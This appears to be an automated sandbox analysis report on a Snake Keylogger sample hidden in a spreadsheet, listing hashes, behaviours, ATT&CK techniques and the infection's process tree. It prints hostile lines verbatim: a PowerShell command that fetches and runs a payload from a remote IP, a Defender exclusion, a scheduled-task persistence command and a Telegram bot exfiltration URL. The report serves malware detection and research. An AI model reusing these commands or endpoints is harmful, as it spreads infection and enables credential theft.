snakekeylogger | a26cf1908d8e2e9ab6e9b3fdf31d6cb5d58d7035374cd513b459a1541cc2fc79

Analysis

max time kernel
144s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
23-03-2023 14:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SHIPPING DOCUMENTS.xls
Size

1.5MB
MD5

518e41c69dec599380cccb991d047e16
SHA1

5b061c85b3c5be0079bdc830389f197c059e6f44
SHA256

a26cf1908d8e2e9ab6e9b3fdf31d6cb5d58d7035374cd513b459a1541cc2fc79
SHA512

b7f0e1f2cdb7edda83180262d4bd138f06a24a9335a4e437903806398dbdd25f4170bfe967b1cf476c73a865db3bffdf31a8957ed2683188e9a1aecaf790c761
SSDEEP

24576:w+3bqIKPsoGRwGtt6EaSE8hpaMNzl8raUtGCn113q49zuCr2+zm/E0IEWQNLGBuu:DrtKjG/n6Ead9MNzlMRtGCn113q496CJ

Score

10^/10

snakekeylogger collection keylogger stealer

Malware Config

Extracted

Family

snakekeylogger

https://api.telegram.org/bot5641589629:AAE7PbYkX7JPIEd1r5HHvkG2FiDsJ1HpC0c/sendMessage?chat_id=5609091537

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

wscript.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3396	4872	wscript.exe	EXCEL.EXE

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/940-234-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger

Blocklisted process makes network request 2 IoCs

Processes:

wscript.exepowershell.exe

flow pid process

41 3396 wscript.exe
43 4888 powershell.exe
Downloads MZ/PE file

flow	pid	process
41	3396	wscript.exe
43	4888	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

b.pifwscript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	b.pif
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 1 IoCs

Processes:

b.pif

pid process

4908 b.pif

pid	process
4908	b.pif

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

RegSvcs.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

59 checkip.dyndns.org
Suspicious use of SetThreadContext 1 IoCs

Processes:

b.pif

description pid process target process

PID 4908 set thread context of 940 4908 b.pif RegSvcs.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	ioc
59	checkip.dyndns.org

description	pid	process	target process
PID 4908 set thread context of 940	4908	b.pif	RegSvcs.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXEAcroRd32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2208 schtasks.exe

pid	process
2208	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

Processes:

b.pif

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings b.pif
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4872 EXCEL.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings	b.pif

Suspicious behavior: EnumeratesProcesses 27 IoCs

Processes:

EXCEL.EXEpowershell.exeb.pifpowershell.exeAcroRd32.exe

pid	process
4872	EXCEL.EXE
4888	powershell.exe
4888	powershell.exe
4908	b.pif
4908	b.pif
2760	powershell.exe
2760	powershell.exe
5004	AcroRd32.exe
5004	AcroRd32.exe
5004	AcroRd32.exe
5004	AcroRd32.exe
5004	AcroRd32.exe
5004	AcroRd32.exe
5004	AcroRd32.exe
5004	AcroRd32.exe
5004	AcroRd32.exe
5004	AcroRd32.exe
5004	AcroRd32.exe
5004	AcroRd32.exe
5004	AcroRd32.exe
5004	AcroRd32.exe
5004	AcroRd32.exe
5004	AcroRd32.exe
5004	AcroRd32.exe
5004	AcroRd32.exe
5004	AcroRd32.exe
5004	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

EXCEL.EXEpowershell.exeb.pifpowershell.exe

description	pid	process
Token: SeDebugPrivilege	4872	EXCEL.EXE
Token: SeDebugPrivilege	4888	powershell.exe
Token: SeDebugPrivilege	4908	b.pif
Token: SeDebugPrivilege	2760	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

EXCEL.EXEAcroRd32.exe

pid process

4872 EXCEL.EXE
4872 EXCEL.EXE
5004 AcroRd32.exe

Suspicious use of SetWindowsHookEx 18 IoCs

Processes:

EXCEL.EXEAcroRd32.exe

pid	process
4872	EXCEL.EXE
4872	EXCEL.EXE
4872	EXCEL.EXE
4872	EXCEL.EXE
4872	EXCEL.EXE
4872	EXCEL.EXE
4872	EXCEL.EXE
4872	EXCEL.EXE
4872	EXCEL.EXE
4872	EXCEL.EXE
4872	EXCEL.EXE
4872	EXCEL.EXE
5004	AcroRd32.exe
5004	AcroRd32.exe
5004	AcroRd32.exe
5004	AcroRd32.exe
5004	AcroRd32.exe
5004	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

EXCEL.EXEwscript.exepowershell.exeb.pifAcroRd32.exeRdrCEF.exe

description	pid	process	target process
PID 4872 wrote to memory of 3396	4872	EXCEL.EXE	wscript.exe
PID 4872 wrote to memory of 3396	4872	EXCEL.EXE	wscript.exe
PID 3396 wrote to memory of 4888	3396	wscript.exe	powershell.exe
PID 3396 wrote to memory of 4888	3396	wscript.exe	powershell.exe
PID 4888 wrote to memory of 4908	4888	powershell.exe	b.pif
PID 4888 wrote to memory of 4908	4888	powershell.exe	b.pif
PID 4888 wrote to memory of 4908	4888	powershell.exe	b.pif
PID 4908 wrote to memory of 5004	4908	b.pif	AcroRd32.exe
PID 4908 wrote to memory of 5004	4908	b.pif	AcroRd32.exe
PID 4908 wrote to memory of 5004	4908	b.pif	AcroRd32.exe
PID 4908 wrote to memory of 2760	4908	b.pif	powershell.exe
PID 4908 wrote to memory of 2760	4908	b.pif	powershell.exe
PID 4908 wrote to memory of 2760	4908	b.pif	powershell.exe
PID 4908 wrote to memory of 2208	4908	b.pif	schtasks.exe
PID 4908 wrote to memory of 2208	4908	b.pif	schtasks.exe
PID 4908 wrote to memory of 2208	4908	b.pif	schtasks.exe
PID 4908 wrote to memory of 940	4908	b.pif	RegSvcs.exe
PID 4908 wrote to memory of 940	4908	b.pif	RegSvcs.exe
PID 4908 wrote to memory of 940	4908	b.pif	RegSvcs.exe
PID 4908 wrote to memory of 940	4908	b.pif	RegSvcs.exe
PID 4908 wrote to memory of 940	4908	b.pif	RegSvcs.exe
PID 4908 wrote to memory of 940	4908	b.pif	RegSvcs.exe
PID 4908 wrote to memory of 940	4908	b.pif	RegSvcs.exe
PID 4908 wrote to memory of 940	4908	b.pif	RegSvcs.exe
PID 5004 wrote to memory of 1276	5004	AcroRd32.exe	RdrCEF.exe
PID 5004 wrote to memory of 1276	5004	AcroRd32.exe	RdrCEF.exe
PID 5004 wrote to memory of 1276	5004	AcroRd32.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe
PID 1276 wrote to memory of 3000	1276	RdrCEF.exe	RdrCEF.exe

outlook_office_path 1 IoCs

Processes:

RegSvcs.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

outlook_win_path 1 IoCs

Processes:

RegSvcs.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SHIPPING DOCUMENTS.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4872

C:\Windows\SYSTEM32\wscript.exe
wscript C:\Users\Public\textfile.wsf
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "& { Invoke-WebRequest -Uri 'http://37.139.128.83/black/b.pif' -OutFile 'C:\Users\Public\b.pif'; C:\Users\Public\b.pif }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4888

C:\Users\Public\b.pif
"C:\Users\Public\b.pif"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4908

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\golden.pdf"
5⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5004

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
6⤵
- Suspicious use of WriteProcessMemory
PID:1276

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=759AA5A3E7BD0C92AF420BA7F880FBCC --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=759AA5A3E7BD0C92AF420BA7F880FBCC --renderer-client-id=2 --mojo-platform-channel-handle=1736 --allow-no-sandbox-job /prefetch:1
7⤵
PID:3000

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=66E4FFCFDD8070381C9F96DDACEC6E72 --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
7⤵
PID:4080

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=511B4BD05A9E57C9D94FF3B82B5ABBE1 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=511B4BD05A9E57C9D94FF3B82B5ABBE1 --renderer-client-id=4 --mojo-platform-channel-handle=2304 --allow-no-sandbox-job /prefetch:1
7⤵
PID:2264

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=523C804AD978F81641B34C6D65041520 --mojo-platform-channel-handle=2436 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
7⤵
PID:5012

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9A4DACCB452FB5B4FA2D1064FC1D9092 --mojo-platform-channel-handle=2668 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
7⤵
PID:4684

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EFEA3721EFA1C5B8EDCFB4919D407F99 --mojo-platform-channel-handle=2448 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
7⤵
PID:3168

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\YbBJEfC.exe"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2760

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YbBJEfC" /XML "C:\Users\Admin\AppData\Local\Temp\tmp9C40.tmp"
5⤵
- Creates scheduled task(s)
PID:2208

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
5⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:940

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4188

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Email Collection

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
Filesize
64KB

MD5
3b014b7f67180778d79ee47476711fb1

SHA1
bcfe8d3862cf3f76e603f0e5ef02a39329512245

SHA256
10271d9ccf70c8f4a86910c0ba5c0870d7142bf4644fa600538363fc5af89686

SHA512
a6b3f2f1d5859af44021636ac6e44c8021018c187ce21c46110600c0752bccb15ce5e36b08e42e47192cebe12e99eb81188846b5af6632f8475b17e6f66d2586

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\PowerQuery\temp.User.zip
Filesize
768B

MD5
590072559559196f8d4f17ca449c80a5

SHA1
0ea5ed0064e52413c97d3530d7404ec63fcfd7e9

SHA256
75b4c8eac632f150a77bbc57600158613ac43761a48200e655ab193ad1a01a18

SHA512
90c5d01b0407dce681cfc1d3e5857567e240158a812a2ecacba376c59d9e7dbf39c49853c9f1d34da92beabacc04adae5ca193c20c8378f02d91d6edde76b569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
a2b24af1492f112d2e53cb7415fda39f

SHA1
dbfcee57242a14b60997bd03379cc60198976d85

SHA256
fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073

SHA512
9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u4xmfobv.qwe.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
